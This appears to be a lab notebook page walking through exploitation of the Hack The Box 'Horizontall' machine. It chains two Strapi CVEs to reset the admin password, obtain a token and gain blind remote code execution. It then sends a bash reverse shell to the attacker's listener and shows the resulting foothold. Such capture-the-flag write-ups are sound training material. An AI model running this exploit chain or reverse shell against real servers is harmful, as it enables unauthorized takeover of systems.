InfoSec LAB

Horizontall_Exploitation

Created: 3 min read

Remote Code Execution

The web application is hosting a vulnerable instance of Strapi in the virtual host / sub-domain; apt-prod.horizontall.htb the target strapi is confirmed to be vulnerable to both [[horizontall_cve-2019-18818#cve-2019-18818|CVE-2019-18818]] and [[Horizontall_CVE-2019-19609#CVE-2019-19609|CVE-2019-19609]], effectively resulting unauthenticated remote code execution via initially forcing password reset followed by code execution

┌──(kali㉿kali)-[~/archive/htb/labs/horizontall]
└─$ python3 rce.py http://api-prod.horizontall.htb
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
 
 
[+] Password reset was successfully
[+] your email is: admin@horizontall.htb
[+] your new credentials are: admin:SuperStrongPassword1
[+] your authenticated json web token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjgxMzk5MDY0LCJleHAiOjE2ODM5OTEwNjR9.L5UseQ5IxN-9exnk_UQaUqoBqEQhDWNfB0QX2FJY4Pk
 
 
$>

Launching the Python script initially perform a password reset against the admin user and retrieved the session token It also sets up a temporary shell session via command execution through the Install plugin component located at /admin/plugins/install

$> id
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
{"statuscode":400,"error":"Bad Request","message":[{"messages":[{"id":"An error occurred"}]}]}

Inputting an OS command doesn’t print out the output since this is a blind RCE that doesn’t print out the output However, it does executes

$> ping 10.10.14.7 -c 4
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
{"statuscode":400,"error":"Bad Request","message":[{"messages":[{"id":"An error occurred"}]}]}

I can confirm that by pinging Kali 4 times

┌──(kali㉿kali)-[~/archive/htb/labs/horizontall]
└─$ sudo tcpdump -i tun0 -p icmp                          
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
18:16:30.399364 IP horizontall.htb > 10.10.14.7: ICMP echo request, id 8112, seq 1, length 64
18:16:30.399509 IP 10.10.14.7 > horizontall.htb: ICMP echo reply, id 8112, seq 1, length 64
18:16:31.399506 IP horizontall.htb > 10.10.14.7: ICMP echo request, id 8112, seq 2, length 64
18:16:31.399521 IP 10.10.14.7 > horizontall.htb: ICMP echo reply, id 8112, seq 2, length 64
18:16:32.402460 IP horizontall.htb > 10.10.14.7: ICMP echo request, id 8112, seq 3, length 64
18:16:32.402476 IP 10.10.14.7 > horizontall.htb: ICMP echo reply, id 8112, seq 3, length 64
18:16:33.404127 IP horizontall.htb > 10.10.14.7: ICMP echo request, id 8112, seq 4, length 64
18:16:33.404159 IP 10.10.14.7 > horizontall.htb: ICMP echo reply, id 8112, seq 4, length 64

As shown above, Kali received 4 ICMP packets

$> /bin/bash -c '/bin/sh -i >& /dev/tcp/10.10.14.7/9999 0>&1'
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output

I sent in a very simple bash reverse shell command

┌──(kali㉿kali)-[~/archive/htb/labs/horizontall]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.105] 45718
/bin/sh: 0: can't access tty; job control turned off
$ whoami
strapi
$ hostanme
/bin/sh: 2: hostanme: not found
$ hostname
horizontall
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.105  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:8e92  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:8e92  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:8e:92  txqueuelen 1000  (Ethernet)
        RX packets 3056592  bytes 579882623 (579.8 MB)
        RX errors 0  dropped 100  overruns 0  frame 0
        TX packets 3048785  bytes 1357919332 (1.3 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 8824252  bytes 1057719957 (1.0 GB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8824252  bytes 1057719957 (1.0 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

initial foothold established to the target system as the strapi user via chaining [[horizontall_cve-2019-18818#cve-2019-18818|CVE-2019-18818]] and [[Horizontall_CVE-2019-19609#CVE-2019-19609|CVE-2019-19609]]

Interactive Graph View

Backlinks